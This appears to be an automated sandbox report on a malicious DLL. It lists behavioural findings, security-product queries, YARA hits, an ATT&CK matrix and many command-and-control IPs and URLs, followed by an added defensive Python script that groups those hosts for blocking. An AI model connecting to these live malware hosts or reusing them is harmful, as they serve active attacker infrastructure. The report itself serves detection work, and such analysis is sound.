Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.665370507.000001697FE56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421185062.0000015C89E82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.761522044.0000024B7AA02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 0000000B.00000002.761730487.0000024B7AA28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.761947130.0000027206429000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.761938638.00000136BA229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10049401 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1000D140 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,
Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 149.56.128.192 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 185.157.82.211 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 79.172.212.216 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 131.100.24.231 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 46.55.222.11 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 51.91.76.89 8080
Source: C:\Windows\System32\svchost.exe | Domain query: time.windows.com
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 173.254.208.91 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 160.16.218.63 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 206.188.212.92 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 192.99.251.50 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 51.91.7.5 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 159.8.59.82 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 120.50.40.183 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 58.227.42.236 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 103.221.221.247 8080
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,_strncpy,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _strlen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _strlen,_strlen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _strlen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_strlen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,EnumSystemLocalesA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10045190 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10048415 __lock,_strlen,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10001078 lstrcmpiW,GetVersion,InterlockedExchange,

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 00000010.00000002.761873992.0000020E5823D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000010.00000002.762125761.0000020E58302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.761658717.0000020E58213000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
Source: Yara match | File source: 2.2.regsvr32.exe.4df0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.4f10000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.4590000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.9c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.4230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.4dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.4dc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium3
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      1
                      Windows Service
                      1
                      Windows Service
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      File and Directory Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)111
                      Process Injection
                      2
                      Obfuscated Files or Information
                      Security Account Manager36
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Standard Port
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      DLL Side-Loading
                      NTDS51
                      Security Software Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer3
                      Non-Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      File Deletion
                      LSA Secrets3
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingData Transfer Size Limits14
                      Application Layer Protocol
                      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common21
                      Masquerading
                      Cached Domain Credentials1
                      Process Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                      Process Injection
                      Proc Filesystem1
                      Remote System Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Hidden Files and Directories
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      Regsvr32
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                      Rundll32
                      Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Behavior Graph (ID: 669356, Sample: psIFSn7VLi, Start date: 20/07/2022, Architecture: WINDOWS, Score: 100)

Top-level network contacts: 129.232.188.93 (xneeloZA, South Africa); 185.8.212.130 (UZINFOCOMUZ, Uzbekistan); 39 other IPs or domains.
Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 3 other signatures.

Process tree:
loaddll32.exe
    regsvr32.exe (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
        regsvr32.exe (signature: System process connects to network (likely due to code injection or exploit)); contacts 79.172.212.216, 49864, 8080 (SZERVERPLEXHU, Hungary); 159.8.59.82, 8080 (SOFTLAYERUS, United States); 13 other IPs or domains
    cmd.exe
        rundll32.exe (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
    rundll32.exe
    rundll32.exe
svchost.exe (signature: Changes security center settings (notifications, updates, antivirus, firewall))
    MpCmdRun.exe
        conhost.exe
svchost.exe (signature: System process connects to network (likely due to code injection or exploit))
11 other processes; contact 127.0.0.1 (unknown) and time.windows.com

Source | Detection | Scanner | Label
psIFSn7VLi.dll | 64% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
3.2.rundll32.exe.3530000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
6.2.regsvr32.exe.4590000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.regsvr32.exe.4dc0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
4.2.rundll32.exe.2940000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
4.2.rundll32.exe.4230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.regsvr32.exe.4df0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.2.rundll32.exe.4f10000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.2.regsvr32.exe.9c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
No Antivirus matches
Source | Detection | Scanner | Label
https://51.91.76.89:8080/WUUUrykRKzQgKnGAgOWXwbTPpbZjnbjXYyUgItVQHAlMtltf | 100% | Avira URL Cloud | malware
https://51.91.7.5/ | 17% | Virustotal |
https://51.91.7.5/ | 100% | Avira URL Cloud | malware
https://206.188.212.92:8080/WvwiYegTHwVudezOCrWPjYKhpMeUQep | 100% | Avira URL Cloud | malware
https://46.55.222.11/TBwKHjQjVeCWIQFS | 100% | Avira URL Cloud | malware
https://58.227.42.236/ | 0% | Avira URL Cloud | safe
https://79.172.212.216:8080/VNwOftDFidReElfWGyCwgb | 100% | Avira URL Cloud | malware
https://192.99.251.50/njigQUBviBvfjJoFmpOFCcuxzCMjisKOYgnAJJuZGrOYExdzIkjfPaaGvSwrlp | 100% | Avira URL Cloud | malware
https://46.55.222.11/.50.40.183:80/YQXxdxwQWLyBEVjMOlgty | 100% | Avira URL Cloud | malware
https://120.50.40.183/rosoft | 100% | Avira URL Cloud | malware
https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnP | 0% | Avira URL Cloud | safe
https://51.91.7.5:8080/EEsdElRrfqZScZWLqBhRqLSt | 100% | Avira URL Cloud | malware
https://103.221.221.247:8080/ | 100% | Avira URL Cloud | malware
https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoaw | 100% | Avira URL Cloud | malware
https://192.99.251.50/: | 100% | Avira URL Cloud | malware
https://192.99.251.50/F | 100% | Avira URL Cloud | malware
https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPK | 0% | Avira URL Cloud | safe
https://192.99.251.50/ | 100% | Avira URL Cloud | malware
https://131.100.24.231/ | 100% | Avira URL Cloud | malware
https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002 | 100% | Avira URL Cloud | malware
https://46.55.222.11/TBwKHjQjVeCWIQFSz | 100% | Avira URL Cloud | malware
https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX- | 100% | Avira URL Cloud | malware
http://crl.ver) | 0% | Avira URL Cloud | safe
https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX | 100% | Avira URL Cloud | malware
https://58.227.42.236/N | 0% | Avira URL Cloud | safe
https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg( | 100% | Avira URL Cloud | malware
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://58.227.42.236/c4 | 0% | Avira URL Cloud | safe
https://dynamic.t | 0% | URL Reputation | safe
https://185.157.82.211/ | 100% | Avira URL Cloud | malware
https://79.172.212.216:8080/nes | 100% | Avira URL Cloud | malware
https://51.91.76.89/ | 100% | Avira URL Cloud | malware
https://79.172.212.216:8080/. | 100% | Avira URL Cloud | malware
https://79.172.212.216/ | 100% | Avira URL Cloud | malware
https://46.55.222.11/TBwKHjQjVeCWIQFSi | 100% | Avira URL Cloud | malware
https://206.188.212.92/X | 100% | Avira URL Cloud | malware
https://160.16.218.63:8080/lksHycwarnaSRJQsEAZwtocdkTVZGajE | 100% | Avira URL Cloud | malware
https://120.50.40.183/ | 100% | Avira URL Cloud | malware
https://159.8.59.82/ | 100% | Avira URL Cloud | malware
https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawrlp | 100% | Avira URL Cloud | malware
https://58.227.42.236:80/$v6/ | 0% | Avira URL Cloud | safe
https://58.227.42.236:80/D | 0% | Avira URL Cloud | safe
https://192.99.251.50/27.42.236/h | 100% | Avira URL Cloud | malware
https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg$v6/ | 100% | Avira URL Cloud | malware
https://46.55.222.11/TBwKHjQjVeCWIQFSN | 100% | Avira URL Cloud | malware
https://103.221.221.247/Certificates | 100% | Avira URL Cloud | malware
https://58.227.42.236:80/: | 0% | Avira URL Cloud | safe
https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOa | 100% | Avira URL Cloud | malware
https://206.188.212.92/7 | 100% | Avira URL Cloud | malware
https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOT | 100% | Avira URL Cloud | malware
https://185.157.82.211:8080/cal | 100% | Avira URL Cloud | malware
https://120.50.40.183:80/$v6/ | 100% | Avira URL Cloud | malware
https://185.157.82.211:8080/r | 100% | Avira URL Cloud | malware
https://206.188.212.92/ | 100% | Avira URL Cloud | malware
https://58.227.42.236:80/- | 0% | Avira URL Cloud | safe
https://173.254.208.91/ | 100% | Avira URL Cloud | malware
https://160.16.218.63/ | 100% | Avira URL Cloud | malware
https://www.pango.co/privacy | 0% | URL Reputation | safe
https://149.56.128.192/ | 100% | Avira URL Cloud | malware
https://159.8.59.82:8080/AgctwBgxIsTEnzPyqHwVtfcFB | 100% | Avira URL Cloud | malware
https://www.tiktok.com/legal/report | 0% | URL Reputation | safe
https://103.221.221.247/Global | 100% | Avira URL Cloud | malware
https://79.172.212.2167:8080/ | 0% | Avira URL Cloud | safe
                      https://120.50.40.183:80/za100%Avira URL Cloudmalware
                      https://46.55.222.11/100%Avira URL Cloudmalware
                      https://46.55.222.11/TBwKHjQjVeCWIQFS)100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://120.50.40.183/d100%Avira URL Cloudmalware
                      https://160.16.218.63:8080/5100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLEr100%Avira URL Cloudmalware
                      https://58.227.42.236:80/0%Avira URL Cloudsafe
                      https://103.221.221.247/100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE100%Avira URL Cloudmalware
                      https://120.50.40.183/m100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/i100%Avira URL Cloudmalware
                      https://79.172.212.216:8080/100%Avira URL Cloudmalware
                      https://185.157.82.211:8080/100%Avira URL Cloudmalware
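The table above has one row per URL string recovered from memory, so the same host shows up many times with path fragments and stray trailing bytes, and a host such as 58.227.42.236 carries only "safe" verdicts while its neighbours carry "malware". The Python script below is an added example and is not part of the Joe Sandbox report: it parses rows in the separator-less form in which this table is extracted (URL, detection percentage, scanner and label run together), resolves the ambiguous column boundary that appears when a URL ends in a digit, and collapses the rows to one record per host with the ports seen and the set of verdicts. The sample rows are copied from the table; the triage labels block / reputation-safe / review are this example's own convention rather than a report field, and the parser assumes the detection column only ever holds 0% or 100%, which is what this report shows.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: rows copied from the URL table of this report in
# the run-together form the text extract uses (URL, detection percentage,
# scanner and label with no separator), plus the header line that follows
# the table, to show that non-row text is reported rather than dropped.
SAMPLE_ROWS = """\
https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoaw100%Avira URL Cloudmalware
https://192.99.251.50/F100%Avira URL Cloudmalware
https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPK0%Avira URL Cloudsafe
https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002100%Avira URL Cloudmalware
https://58.227.42.236/c40%Avira URL Cloudsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg(100%Avira URL Cloudmalware
https://79.172.212.216/100%Avira URL Cloudmalware
https://58.227.42.236/N0%Avira URL Cloudsafe
https://79.172.212.2167:8080/0%Avira URL Cloudsafe
https://www.pango.co/privacy0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
"""

# Assumption: the detection column only ever holds 0% or 100% in this table.
# Pinning the percentage to those two values is what makes the column
# boundary recoverable when the URL itself ends in a digit: ".../c40%" must
# split as ".../c4" + "0%", which a generic \d+ would get wrong.
ROW_RE = re.compile(
    r"^(?P<url>https?://\S+?)"
    r"(?P<pct>100|0)%"
    r"(?P<engine>Avira URL Cloud|URL Reputation)"
    r"(?P<verdict>malware|safe)$"
)


def parse_rows(text):
    """Split flattened rows into dicts.  Lines that do not match the layout
    are returned separately so nothing is silently lost."""
    rows, rejects = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            rejects.append(line)
            continue
        row = m.groupdict()
        row["pct"] = int(row["pct"])
        rows.append(row)
    return rows, rejects


def summarize_hosts(rows):
    """Collapse the many URL fragments to one record per host.  Only ports
    written explicitly in a URL are recorded: a fragment such as
    https://79.172.212.216/ is the same host seen elsewhere with :8080, not
    evidence of a second port."""
    hosts = defaultdict(lambda: {"ports": set(), "verdicts": set(),
                                 "engines": set(), "urls": 0})
    for row in rows:
        parts = urlsplit(row["url"])
        rec = hosts[parts.hostname]
        if parts.port is not None:
            rec["ports"].add(parts.port)
        rec["verdicts"].add(row["verdict"])
        rec["engines"].add(row["engine"])
        rec["urls"] += 1
    return dict(hosts)


def triage(rec):
    """Hypothetical triage labels (this example's convention, not a report
    field):
    block           - at least one fragment for this host is rated malware
    reputation-safe - only URL Reputation 'safe' hits, no URL Cloud verdict
    review          - only URL Cloud 'safe' hits; not a clean bill of health
                      for a bare IP with a random-looking path"""
    if "malware" in rec["verdicts"]:
        return "block"
    if rec["engines"] == {"URL Reputation"}:
        return "reputation-safe"
    return "review"


def ioc_lines(summary):
    """One sorted, human-readable line per host."""
    out = []
    for host in sorted(summary):
        rec = summary[host]
        ports = ",".join(str(p) for p in sorted(rec["ports"])) or "-"
        out.append(f"{host} ports={ports} urls={rec['urls']} "
                   f"verdicts={'/'.join(sorted(rec['verdicts']))} -> {triage(rec)}")
    return out


if __name__ == "__main__":
    parsed, bad = parse_rows(SAMPLE_ROWS)
    print("\n".join(ioc_lines(summarize_hosts(parsed))))
    for line in bad:
        print("unparsed:", line)
```

Grouping by hostname rather than by full URL is deliberate: the random-looking path tokens change from string to string and the trailing characters are adjacent memory bytes, so the host and port are the only stable parts worth blocking on. The near-duplicate 79.172.212.2167 (one digit too many) lands in its own "review" bucket next to 79.172.212.216, which is exactly where an analyst should notice it.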
Name | IP | Active | Malicious | Antivirus Detection | Reputation
time.windows.com | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://46.55.222.11/TBwKHjQjVeCWIQFS | true | Avira URL Cloud: malware | unknown
https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://51.91.76.89:8080/WUUUrykRKzQgKnGAgOWXwbTPpbZjnbjXYyUgItVQHAlMtltf | regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://51.91.7.5/ | regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp | true | Virustotal: 17%; Avira URL Cloud: malware | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
